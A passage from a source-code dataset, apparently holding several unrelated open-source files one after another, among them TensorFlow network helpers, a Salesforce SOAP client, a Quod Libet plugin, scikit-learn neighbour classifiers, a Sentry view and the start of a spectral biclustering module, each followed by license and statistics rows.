summaries.append(tf.summary.histogram("activation_n2", self.n2))
summaries.append(tf.summary.histogram("activation_d2", self.d1))
summaries.append(tf.summary.histogram("activation_v", self.logits_v))
summaries.append(tf.summary.histogram("activation_p", self.softmax_p))
self.summary_op = tf.summary.merge(summaries)
self.log_writer = tf.summary.FileWriter("logs/%s" % self.model_name, self.sess.graph)
def dense_layer(self, input, out_dim, name, func=tf.nn.relu):
in_dim = input.get_shape().as_list()[-1]
d = 1.0 / np.sqrt(in_dim)
with tf.variable_scope(name):
w_init = tf.random_uniform_initializer(-d, d)
b_init = tf.random_uniform_initializer(-d, d)
w = tf.get_variable('w', dtype=tf.float32, shape=[in_dim, out_dim], initializer=w_init)
b = tf.get_variable('b', shape=[out_dim], initializer=b_init)
output = tf.matmul(input, w) + b
if func is not None:
output = func(output)
return output
def conv2d_layer(self, input, filter_size, out_dim, name, strides, func=tf.nn.relu):
in_dim = input.get_shape().as_list()[-1]
d = 1.0 / np.sqrt(filter_size * filter_size * in_dim)
with tf.variable_scope(name):
w_init = tf.random_uniform_initializer(-d, d)
b_init = tf.random_uniform_initializer(-d, d)
w = tf.get_variable('w',
shape=[filter_size, filter_size, in_dim, out_dim],
dtype=tf.float32,
initializer=w_init)
b = tf.get_variable('b', shape=[out_dim], initializer=b_init)
output = tf.nn.conv2d(input, w, strides=strides, padding='SAME') + b
if func is not None:
output = func(output)
return output
def __get_base_feed_dict(self):
return {self.var_beta: self.beta, self.var_learning_rate: self.learning_rate}
def get_global_step(self):
step = self.sess.run(self.global_step)
return step
def predict_single(self, x):
return self.predict_p(x[None, :])[0]
def predict_v(self, x):
prediction = self.sess.run(self.logits_v, feed_dict={self.x: x})
return prediction
def predict_p(self, x):
prediction = self.sess.run(self.softmax_p, feed_dict={self.x: x})
return prediction
def predict_p_and_v(self, x):
return self.sess.run([self.softmax_p, self.logits_v], feed_dict={self.x: x})
def train(self, x, y_r, a, trainer_id):
feed_dict = self.__get_base_feed_dict()
feed_dict.update({self.x: x, self.y_r: y_r, self.action_index: a})
self.sess.run(self.train_op, feed_dict=feed_dict)
def log(self, x, y_r, a):
feed_dict = self.__get_base_feed_dict()
feed_dict.update({self.x: x, self.y_r: y_r, self.action_index: a})
step, summary = self.sess.run([self.global_step, self.summary_op], feed_dict=feed_dict)
self.log_writer.add_summary(summary, step)
def _checkpoint_filename(self, episode):
return 'checkpoints/%s_%08d' % (self.model_name, episode)
def _get_episode_from_filename(self, filename):
# TODO: hacky way of getting the episode. ideally episode should be stored as a TF variable
return int(re.split('/|_|\.', filename)[2])
def save(self, episode):
self.saver.save(self.sess, self._checkpoint_filename(episode))
def load(self):
filename = tf.train.latest_checkpoint(os.path.dirname(self._checkpoint_filename(episode=0)))
if Config.LOAD_EPISODE > 0:
filename = self._checkpoint_filename(Config.LOAD_EPISODE)
self.saver.restore(self.sess, filename)
return self._get_episode_from_filename(filename)
def get_variables_names(self):
return [var.name for var in self.graph.get_collection('trainable_variables')]
def get_variable_value(self, name):
return self.sess.run(self.graph.get_tensor_by_name(name))
| gpl-2.0 | -4,183,307,470,993,491,500 | 46.94382 | 126 | 0.611515 | false |
heroku/python-salesforce-client | salesforce/soap/base.py | 1 | 5676 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import logging
import urlparse
logger = logging.getLogger(__name__)
try:
import suds.client
if suds.__version__ < '0.6':
raise ImportError
except ImportError:
logger.error("The metadata API requires suds-jurko >= 0.6")
exit()
from requests import Session
from requests.adapters import BaseAdapter
from requests.auth import HTTPBasicAuth
from requests.models import Response
from suds import WebFault
from suds.client import Client
from suds.plugin import MessagePlugin
from suds.properties import Unskin
from suds.transport import Transport, TransportError, Reply
class FileAdapter(BaseAdapter):
def send(self, request, **kwargs):
response = Response()
response.headers = {}
response.encoding = 'utf-8' # FIXME: this is a complete guess
response.url = request.url
response.request = request
response.connection = self
try:
response.raw = open(request.url.replace('file://', ''), 'r')
except IOError as e:
response.status_code = 404
return response
response.status_code = 200
return response
def close(self):
pass
class RequestsHttpTransport(Transport):
def __init__(self, session=None, **kwargs):
Transport.__init__(self)
Unskin(self.options).update(kwargs)
self.session = session or Session()
# Suds expects support for local files URIs.
self.session.mount('file://', FileAdapter())
def _call(self, request, method):
headers = dict(self.options.headers)
headers.update(request.headers)
if self.options.username and self.options.password:
auth = HTTPBasicAuth(self.options.username, self.options.password)
else:
auth = None
response = getattr(self.session, method)(request.url,
auth=auth,
data=request.message,
headers=headers,
timeout=self.options.timeout,
proxies=self.options.proxy,
stream=True)
return response
def open(self, request):
return self._call(request, 'get').raw
def send(self, request):
response = self._call(request, 'post')
return Reply(response.status_code, response.headers, response.content)
class SalesforceSoapClientBase(object):
@property
def version(self):
raise NotImplementedError('Subclasses must specify a version.')
@property
def wsdl_path(self):
raise NotImplementedError('Subclasses must specify a wsdl path.')
def __init__(self, client_id, client_secret, domain, access_token,
refresh_token=None, token_updater=None):
# This plugin is needed in order to keep empty complex objects from
        # getting sent in the soap payload.
class PrunePlugin(MessagePlugin):
def marshalled(self, context):
context.envelope[1].prune()
wsdl = 'file://{0}'.format(self.wsdl_path)
self.client = Client(wsdl, transport=RequestsHttpTransport(),
plugins=[PrunePlugin()])
self._set_session_header(access_token)
endpoint = 'https://{0}/services/Soap/m/{1}/{2}'.format(
domain,
self.version,
access_token.split('!', 1)[0], # Salesforce org ID
)
self.client.set_options(location=endpoint)
if refresh_token is not None:
from ..rest import SalesforceRestClient
self.rest_client = SalesforceRestClient(client_id, client_secret,
domain,
access_token=access_token,
refresh_token=refresh_token,
token_updater=token_updater)
else:
self.rest_client = None
@staticmethod
def login(wsdl_path, username, password, token):
client = Client('file://{0}'.format(wsdl_path))
response = client.service.login(username, password + token)
return (
response.sessionId,
urlparse.urlparse(response.serverUrl).netloc,
)
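    # Hypothetical usage sketch for login() (the WSDL path and credentials
    # below are placeholders, not values defined elsewhere in this module):
    #   session_id, domain = SalesforceSoapClientBase.login(
    #       'partner.wsdl', 'user@example.com', 'password', 'security_token')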
def _set_session_header(self, access_token):
session_header = self.client.factory.create('SessionHeader')
session_header.sessionId = access_token
headers = {
'SessionHeader': session_header
}
self.client.set_options(soapheaders=headers)
def _call(self, function_name, args=None, kwargs=None):
args = args or []
kwargs = kwargs or {}
func = getattr(self.client.service, function_name)
# TODO: parse response, return something actually useful
try:
return func(*args, **kwargs)
except WebFault as e:
# Detect whether the failure is due to an invalid session, and if
# possible, try to refresh the access token.
if (hasattr(e, 'fault') and
e.fault.faultcode == 'sf:INVALID_SESSION_ID' and
self.rest_client):
token = self.rest_client._refresh_token()
if token:
self._set_session_header(token['access_token'])
return func(*args, **kwargs)
raise
| mit | 1,096,312,723,674,942,000 | 34.037037 | 80 | 0.570825 | false |
elbeardmorez/quodlibet | quodlibet/quodlibet/ext/events/visualisations.py | 1 | 3329 | # -*- coding: utf-8 -*-
# Copyright 2017 Nick Boultbee
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
import os
import signal
from gi.repository import Gtk
from quodlibet import _
from quodlibet import app
from quodlibet import print_d
from quodlibet import print_w
from quodlibet.plugins import PluginConfig
from quodlibet.plugins.events import EventPlugin
from quodlibet.qltk import Button
from quodlibet.qltk import ErrorMessage
from quodlibet.qltk import Icons
from quodlibet.qltk.entry import UndoEntry
from quodlibet.util import escape
class ProjectM(EventPlugin):
"""Launch external visualisations, e.g. via projectM
Try this first (Ubuntu/Debian):
sudo apt-get install projectm-pulseaudio
"""
_config = PluginConfig(__name__)
PLUGIN_ID = "visualisations"
PLUGIN_NAME = _("Launch Visualisations")
PLUGIN_ICON = Icons.IMAGE_X_GENERIC
PLUGIN_DESC = _("Launch external visualisations.")
DEFAULT_EXEC = 'projectM-pulseaudio'
def __init__(self):
self._pid = None
def enabled(self):
from gi.repository import GLib
print_d("Starting %s" % self.PLUGIN_NAME)
try:
self._pid, fdin, fdout, fderr = GLib.spawn_async(
argv=self.executable.split(),
flags=GLib.SpawnFlags.SEARCH_PATH,
standard_output=True,
standard_input=True)
except GLib.Error as e:
msg = ((_("Couldn't run visualisations using '%s'") + " (%s)") %
(escape(self.executable), escape(e.message)))
ErrorMessage(title=_("Error"), description=msg,
parent=app.window).run()
else:
# self._stdin = os.fdopen(fdin, mode='w')
print_d("Launched with PID: %s" % self._pid)
def disabled(self):
if not self._pid:
return
print_d("Shutting down %s" % self.PLUGIN_NAME)
try:
os.kill(self._pid, signal.SIGTERM)
os.kill(self._pid, signal.SIGKILL)
except Exception as e:
print_w("Couldn't shut down cleanly (%s)" % e)
def PluginPreferences(self, *args):
vbox = Gtk.VBox(spacing=12)
label = Gtk.Label(label=_("Visualiser executable:"))
def edited(widget):
self.executable = widget.get_text()
entry = UndoEntry()
entry.connect('changed', edited)
entry.set_text(self.executable)
hbox = Gtk.HBox(spacing=6)
hbox.pack_start(label, False, False, 0)
hbox.pack_start(entry, True, True, 0)
vbox.pack_start(hbox, True, True, 0)
def refresh_clicked(widget):
self.disabled()
self.enabled()
refresh_button = Button(_("Reload"), Icons.VIEW_REFRESH)
refresh_button.connect('clicked', refresh_clicked)
vbox.pack_start(refresh_button, False, False, 0)
return vbox
@property
def executable(self):
return self._config.get('executable', self.DEFAULT_EXEC)
@executable.setter
def executable(self, value):
self._config.set('executable', value)
| gpl-2.0 | -5,147,228,131,064,625,000 | 31.320388 | 76 | 0.625713 | false |
daicang/Leetcode-solutions | 004-median-of-two-sorted-arrays.py | 1 | 1417 | #!/usr/bin/python
class Solution(object):
def findMedianSortedArrays(self, nums1, nums2):
size = len(nums1) + len(nums2)
if size % 2 == 0:
return (self.getk(nums1[:], nums2[:], size/2)+
self.getk(nums1[:], nums2[:], size/2-1))/2.0
else:
return self.getk(nums1[:], nums2[:], size/2)
def getk(self, a, b, k):
if len(a) > len(b): a, b = b, a
if len(a) <= 2:
b.extend(a)
b.sort()
return b[k]
if not a: return b[k]
if k <= 0: return min(a[0], b[0])
m, n = len(a), len(b)
if (m+n)/2 >= k:
if a[m/2] >= b[n/2]:
return self.getk(a[:m/2+1], b, k)
else:
return self.getk(a, b[:n/2+1], k)
else:
if a[m/2] >= b[n/2]:
return self.getk(a, b[n/2:], k - n/2)
else:
return self.getk(a[m/2:], b, k - m/2)
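    # getk(a, b, k) returns the k-th smallest element (0-indexed) of the two
    # sorted arrays. Each call compares the middle elements of a and b and
    # discards a chunk of one array that provably cannot contain the answer,
    # reducing k when the discarded elements are all smaller than it; once an
    # array has at most two elements the remainder is merged and sorted.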
# def myfunc(a, b, c):
# return a, b, c
# print myfunc(1, 2, 4/3)
a = [1, 2, 3, 4, 5]
b = [3, 5, 6, 7]
c = []
d = [1]
e = [2, 3, 4, 5, 7, 8, 9, 10, 11, 13, 17, 54, 83]
f = [1, 6, 9, 22, 45, 103, 255, 1024]
g = [1, 2, 2]
h = [1, 2, 3]
s = Solution()
print s.findMedianSortedArrays(a, b)
print s.findMedianSortedArrays(c, d)
print s.findMedianSortedArrays(e, f)
print s.findMedianSortedArrays(g, h)
| mit | -7,180,720,171,993,316,000 | 27.918367 | 64 | 0.440367 | false |
bnaul/scikit-learn | sklearn/neighbors/_classification.py | 2 | 23284 | """Nearest Neighbor Classification"""
# Authors: Jake Vanderplas <[email protected]>
# Fabian Pedregosa <[email protected]>
# Alexandre Gramfort <[email protected]>
# Sparseness support by Lars Buitinck
# Multi-output support by Arnaud Joly <[email protected]>
#
# License: BSD 3 clause (C) INRIA, University of Amsterdam
import numpy as np
from scipy import stats
from ..utils.extmath import weighted_mode
from ..utils.validation import _is_arraylike, _num_samples
import warnings
from ._base import _check_weights, _get_weights
from ._base import NeighborsBase, KNeighborsMixin, RadiusNeighborsMixin
from ..base import ClassifierMixin
from ..utils import check_array
from ..utils.validation import _deprecate_positional_args
class KNeighborsClassifier(KNeighborsMixin,
ClassifierMixin,
NeighborsBase):
"""Classifier implementing the k-nearest neighbors vote.
Read more in the :ref:`User Guide <classification>`.
Parameters
----------
n_neighbors : int, default=5
Number of neighbors to use by default for :meth:`kneighbors` queries.
weights : {'uniform', 'distance'} or callable, default='uniform'
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, default='auto'
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, default=30
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : int, default=2
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric : str or callable, default='minkowski'
the distance metric to use for the tree. The default metric is
minkowski, and with p=2 is equivalent to the standard Euclidean
metric. See the documentation of :class:`DistanceMetric` for a
list of available metrics.
If metric is "precomputed", X is assumed to be a distance matrix and
must be square during fit. X may be a :term:`sparse graph`,
in which case only "nonzero" elements may be considered neighbors.
metric_params : dict, default=None
Additional keyword arguments for the metric function.
n_jobs : int, default=None
The number of parallel jobs to run for neighbors search.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Doesn't affect :meth:`fit` method.
Attributes
----------
classes_ : array of shape (n_classes,)
Class labels known to the classifier
    effective_metric_ : str or callable
The distance metric used. It will be same as the `metric` parameter
or a synonym of it, e.g. 'euclidean' if the `metric` parameter set to
'minkowski' and `p` parameter set to 2.
effective_metric_params_ : dict
Additional keyword arguments for the metric function. For most metrics
will be same with `metric_params` parameter, but may also contain the
`p` parameter value if the `effective_metric_` attribute is set to
'minkowski'.
n_samples_fit_ : int
Number of samples in the fitted data.
outputs_2d_ : bool
False when `y`'s shape is (n_samples, ) or (n_samples, 1) during fit
otherwise True.
Examples
--------
>>> X = [[0], [1], [2], [3]]
>>> y = [0, 0, 1, 1]
>>> from sklearn.neighbors import KNeighborsClassifier
>>> neigh = KNeighborsClassifier(n_neighbors=3)
>>> neigh.fit(X, y)
KNeighborsClassifier(...)
>>> print(neigh.predict([[1.1]]))
[0]
>>> print(neigh.predict_proba([[0.9]]))
[[0.66666667 0.33333333]]
See also
--------
RadiusNeighborsClassifier
KNeighborsRegressor
RadiusNeighborsRegressor
NearestNeighbors
Notes
-----
See :ref:`Nearest Neighbors <neighbors>` in the online documentation
for a discussion of the choice of ``algorithm`` and ``leaf_size``.
.. warning::
Regarding the Nearest Neighbors algorithms, if it is found that two
neighbors, neighbor `k+1` and `k`, have identical distances
but different labels, the results will depend on the ordering of the
training data.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
@_deprecate_positional_args
def __init__(self, n_neighbors=5, *,
weights='uniform', algorithm='auto', leaf_size=30,
p=2, metric='minkowski', metric_params=None, n_jobs=None,
**kwargs):
super().__init__(
n_neighbors=n_neighbors,
algorithm=algorithm,
leaf_size=leaf_size, metric=metric, p=p,
metric_params=metric_params,
n_jobs=n_jobs, **kwargs)
self.weights = _check_weights(weights)
def fit(self, X, y):
"""Fit the k-nearest neighbors classifier from the training dataset.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features) or \
(n_samples, n_samples) if metric='precomputed'
Training data.
y : {array-like, sparse matrix} of shape (n_samples,) or \
(n_samples, n_outputs)
Target values.
Returns
-------
self : KNeighborsClassifier
The fitted k-nearest neighbors classifier.
"""
return self._fit(X, y)
def predict(self, X):
"""Predict the class labels for the provided data.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
y : ndarray of shape (n_queries,) or (n_queries, n_outputs)
Class labels for each data sample.
"""
X = check_array(X, accept_sparse='csr')
neigh_dist, neigh_ind = self.kneighbors(X)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
n_outputs = len(classes_)
n_queries = _num_samples(X)
weights = _get_weights(neigh_dist, self.weights)
y_pred = np.empty((n_queries, n_outputs), dtype=classes_[0].dtype)
for k, classes_k in enumerate(classes_):
if weights is None:
mode, _ = stats.mode(_y[neigh_ind, k], axis=1)
else:
mode, _ = weighted_mode(_y[neigh_ind, k], weights, axis=1)
mode = np.asarray(mode.ravel(), dtype=np.intp)
y_pred[:, k] = classes_k.take(mode)
if not self.outputs_2d_:
y_pred = y_pred.ravel()
return y_pred
def predict_proba(self, X):
"""Return probability estimates for the test data X.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
p : ndarray of shape (n_queries, n_classes), or a list of n_outputs
of such arrays if n_outputs > 1.
The class probabilities of the input samples. Classes are ordered
by lexicographic order.
"""
X = check_array(X, accept_sparse='csr')
neigh_dist, neigh_ind = self.kneighbors(X)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
n_queries = _num_samples(X)
weights = _get_weights(neigh_dist, self.weights)
if weights is None:
weights = np.ones_like(neigh_ind)
all_rows = np.arange(X.shape[0])
probabilities = []
for k, classes_k in enumerate(classes_):
pred_labels = _y[:, k][neigh_ind]
proba_k = np.zeros((n_queries, classes_k.size))
# a simple ':' index doesn't work right
for i, idx in enumerate(pred_labels.T): # loop is O(n_neighbors)
proba_k[all_rows, idx] += weights[:, i]
# normalize 'votes' into real [0,1] probabilities
normalizer = proba_k.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba_k /= normalizer
probabilities.append(proba_k)
if not self.outputs_2d_:
probabilities = probabilities[0]
return probabilities
class RadiusNeighborsClassifier(RadiusNeighborsMixin,
ClassifierMixin,
NeighborsBase):
"""Classifier implementing a vote among neighbors within a given radius
Read more in the :ref:`User Guide <classification>`.
Parameters
----------
radius : float, default=1.0
Range of parameter space to use by default for :meth:`radius_neighbors`
queries.
weights : {'uniform', 'distance'} or callable, default='uniform'
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
Uniform weights are used by default.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, default='auto'
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, default=30
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : int, default=2
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric : str or callable, default='minkowski'
the distance metric to use for the tree. The default metric is
minkowski, and with p=2 is equivalent to the standard Euclidean
metric. See the documentation of :class:`DistanceMetric` for a
list of available metrics.
If metric is "precomputed", X is assumed to be a distance matrix and
must be square during fit. X may be a :term:`sparse graph`,
in which case only "nonzero" elements may be considered neighbors.
outlier_label : {manual label, 'most_frequent'}, default=None
label for outlier samples (samples with no neighbors in given radius).
- manual label: str or int label (should be the same type as y)
or list of manual labels if multi-output is used.
- 'most_frequent' : assign the most frequent label of y to outliers.
- None : when any outlier is detected, ValueError will be raised.
metric_params : dict, default=None
Additional keyword arguments for the metric function.
n_jobs : int, default=None
The number of parallel jobs to run for neighbors search.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Attributes
----------
classes_ : ndarray of shape (n_classes,)
Class labels known to the classifier.
effective_metric_ : str or callable
The distance metric used. It will be same as the `metric` parameter
or a synonym of it, e.g. 'euclidean' if the `metric` parameter set to
'minkowski' and `p` parameter set to 2.
effective_metric_params_ : dict
Additional keyword arguments for the metric function. For most metrics
will be same with `metric_params` parameter, but may also contain the
`p` parameter value if the `effective_metric_` attribute is set to
'minkowski'.
n_samples_fit_ : int
Number of samples in the fitted data.
outlier_label_ : int or array-like of shape (n_class,)
Label which is given for outlier samples (samples with no neighbors
on given radius).
outputs_2d_ : bool
False when `y`'s shape is (n_samples, ) or (n_samples, 1) during fit
otherwise True.
Examples
--------
>>> X = [[0], [1], [2], [3]]
>>> y = [0, 0, 1, 1]
>>> from sklearn.neighbors import RadiusNeighborsClassifier
>>> neigh = RadiusNeighborsClassifier(radius=1.0)
>>> neigh.fit(X, y)
RadiusNeighborsClassifier(...)
>>> print(neigh.predict([[1.5]]))
[0]
>>> print(neigh.predict_proba([[1.0]]))
[[0.66666667 0.33333333]]
See also
--------
KNeighborsClassifier
RadiusNeighborsRegressor
KNeighborsRegressor
NearestNeighbors
Notes
-----
See :ref:`Nearest Neighbors <neighbors>` in the online documentation
for a discussion of the choice of ``algorithm`` and ``leaf_size``.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
@_deprecate_positional_args
def __init__(self, radius=1.0, *, weights='uniform',
algorithm='auto', leaf_size=30, p=2, metric='minkowski',
outlier_label=None, metric_params=None, n_jobs=None,
**kwargs):
super().__init__(
radius=radius,
algorithm=algorithm,
leaf_size=leaf_size,
metric=metric, p=p, metric_params=metric_params,
n_jobs=n_jobs, **kwargs)
self.weights = _check_weights(weights)
self.outlier_label = outlier_label
def fit(self, X, y):
"""Fit the radius neighbors classifier from the training dataset.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features) or \
(n_samples, n_samples) if metric='precomputed'
Training data.
y : {array-like, sparse matrix} of shape (n_samples,) or \
(n_samples, n_outputs)
Target values.
Returns
-------
self : RadiusNeighborsClassifier
The fitted radius neighbors classifier.
"""
self._fit(X, y)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
if self.outlier_label is None:
outlier_label_ = None
elif self.outlier_label == 'most_frequent':
outlier_label_ = []
# iterate over multi-output, get the most frequent label for each
# output.
for k, classes_k in enumerate(classes_):
label_count = np.bincount(_y[:, k])
outlier_label_.append(classes_k[label_count.argmax()])
else:
if (_is_arraylike(self.outlier_label) and
not isinstance(self.outlier_label, str)):
if len(self.outlier_label) != len(classes_):
raise ValueError("The length of outlier_label: {} is "
"inconsistent with the output "
"length: {}".format(self.outlier_label,
len(classes_)))
outlier_label_ = self.outlier_label
else:
outlier_label_ = [self.outlier_label] * len(classes_)
for classes, label in zip(classes_, outlier_label_):
if (_is_arraylike(label) and
not isinstance(label, str)):
                    # ensure the outlier label for each output is a scalar.
raise TypeError("The outlier_label of classes {} is "
"supposed to be a scalar, got "
"{}.".format(classes, label))
if np.append(classes, label).dtype != classes.dtype:
# ensure the dtype of outlier label is consistent with y.
raise TypeError("The dtype of outlier_label {} is "
"inconsistent with classes {} in "
"y.".format(label, classes))
self.outlier_label_ = outlier_label_
return self
def predict(self, X):
"""Predict the class labels for the provided data.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
y : ndarray of shape (n_queries,) or (n_queries, n_outputs)
Class labels for each data sample.
"""
probs = self.predict_proba(X)
classes_ = self.classes_
if not self.outputs_2d_:
probs = [probs]
classes_ = [self.classes_]
n_outputs = len(classes_)
n_queries = probs[0].shape[0]
y_pred = np.empty((n_queries, n_outputs), dtype=classes_[0].dtype)
for k, prob in enumerate(probs):
# iterate over multi-output, assign labels based on probabilities
# of each output.
max_prob_index = prob.argmax(axis=1)
y_pred[:, k] = classes_[k].take(max_prob_index)
outlier_zero_probs = (prob == 0).all(axis=1)
if outlier_zero_probs.any():
zero_prob_index = np.flatnonzero(outlier_zero_probs)
y_pred[zero_prob_index, k] = self.outlier_label_[k]
if not self.outputs_2d_:
y_pred = y_pred.ravel()
return y_pred
def predict_proba(self, X):
"""Return probability estimates for the test data X.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
p : ndarray of shape (n_queries, n_classes), or a list of n_outputs
of such arrays if n_outputs > 1.
The class probabilities of the input samples. Classes are ordered
by lexicographic order.
"""
X = check_array(X, accept_sparse='csr')
n_queries = _num_samples(X)
neigh_dist, neigh_ind = self.radius_neighbors(X)
outlier_mask = np.zeros(n_queries, dtype=bool)
outlier_mask[:] = [len(nind) == 0 for nind in neigh_ind]
outliers = np.flatnonzero(outlier_mask)
inliers = np.flatnonzero(~outlier_mask)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
if self.outlier_label_ is None and outliers.size > 0:
raise ValueError('No neighbors found for test samples %r, '
'you can try using larger radius, '
'giving a label for outliers, '
'or considering removing them from your dataset.'
% outliers)
weights = _get_weights(neigh_dist, self.weights)
if weights is not None:
weights = weights[inliers]
probabilities = []
# iterate over multi-output, measure probabilities of the k-th output.
for k, classes_k in enumerate(classes_):
pred_labels = np.zeros(len(neigh_ind), dtype=object)
pred_labels[:] = [_y[ind, k] for ind in neigh_ind]
proba_k = np.zeros((n_queries, classes_k.size))
proba_inl = np.zeros((len(inliers), classes_k.size))
# samples have different size of neighbors within the same radius
if weights is None:
for i, idx in enumerate(pred_labels[inliers]):
proba_inl[i, :] = np.bincount(idx,
minlength=classes_k.size)
else:
for i, idx in enumerate(pred_labels[inliers]):
proba_inl[i, :] = np.bincount(idx,
weights[i],
minlength=classes_k.size)
proba_k[inliers, :] = proba_inl
if outliers.size > 0:
_outlier_label = self.outlier_label_[k]
label_index = np.flatnonzero(classes_k == _outlier_label)
if label_index.size == 1:
proba_k[outliers, label_index[0]] = 1.0
else:
warnings.warn('Outlier label {} is not in training '
'classes. All class probabilities of '
'outliers will be assigned with 0.'
''.format(self.outlier_label_[k]))
# normalize 'votes' into real [0,1] probabilities
normalizer = proba_k.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba_k /= normalizer
probabilities.append(proba_k)
if not self.outputs_2d_:
probabilities = probabilities[0]
return probabilities
| bsd-3-clause | 5,520,555,482,386,144,000 | 36.798701 | 79 | 0.577478 | false |
BayanGroup/sentry | src/sentry/web/frontend/remove_project.py | 1 | 1378 | from __future__ import absolute_import
from django import forms
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.utils.translation import ugettext_lazy as _
from sentry.api import client
from sentry.models import OrganizationMemberType
from sentry.web.frontend.base import ProjectView
class RemoveProjectForm(forms.Form):
pass
class RemoveProjectView(ProjectView):
required_access = OrganizationMemberType.OWNER
sudo_required = True
def get_form(self, request):
if request.method == 'POST':
return RemoveProjectForm(request.POST)
return RemoveProjectForm()
def handle(self, request, organization, team, project):
form = self.get_form(request)
if form.is_valid():
client.delete('/projects/{}/{}/'.format(organization.slug, project.slug),
request.user, is_sudo=True)
messages.add_message(
request, messages.SUCCESS,
_(u'The project %r was scheduled for deletion.') % (project.name.encode('utf-8'),))
return HttpResponseRedirect(reverse('sentry-organization-home', args=[team.organization.slug]))
context = {
'form': form,
}
return self.respond('sentry/projects/remove.html', context)
| bsd-3-clause | 7,260,892,795,162,825,000 | 30.318182 | 107 | 0.674891 | false |
eickenberg/scikit-learn | sklearn/cluster/bicluster/spectral.py | 1 | 19540 | """Implements spectral biclustering algorithms.
Authors : Kemal Eren
License: BSD 3 clause
"""
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import dia_matrix
from scipy.sparse import issparse
from sklearn.base import BaseEstimator, BiclusterMixin
from sklearn.externals import six
from sklearn.utils.arpack import svds
from sklearn.utils.arpack import eigsh
from sklearn.cluster import KMeans
from sklearn.cluster import MiniBatchKMeans
from sklearn.utils.extmath import randomized_svd
from sklearn.utils.extmath import safe_sparse_dot
from sklearn.utils.extmath import make_nonnegative
from sklearn.utils.extmath import norm
from sklearn.utils.validation import assert_all_finite
from sklearn.utils.validation import check_array
from .utils import check_array_ndim
def _scale_normalize(X):
"""Normalize ``X`` by scaling rows and columns independently.
Returns the normalized matrix and the row and column scaling
factors.
"""
X = make_nonnegative(X)
row_diag = np.asarray(1.0 / np.sqrt(X.sum(axis=1))).squeeze()
col_diag = np.asarray(1.0 / np.sqrt(X.sum(axis=0))).squeeze()
row_diag = np.where(np.isnan(row_diag), 0, row_diag)
col_diag = np.where(np.isnan(col_diag), 0, col_diag)
if issparse(X):
n_rows, n_cols = X.shape
r = dia_matrix((row_diag, [0]), shape=(n_rows, n_rows))
c = dia_matrix((col_diag, [0]), shape=(n_cols, n_cols))
an = r * X * c
else:
an = row_diag[:, np.newaxis] * X * col_diag
return an, row_diag, col_diag
def _bistochastic_normalize(X, max_iter=1000, tol=1e-5):
"""Normalize rows and columns of ``X`` simultaneously so that all
rows sum to one constant and all columns sum to a different
constant.
"""
# According to paper, this can also be done more efficiently with
# deviation reduction and balancing algorithms.
X = make_nonnegative(X)
X_scaled = X
dist = None
for _ in range(max_iter):
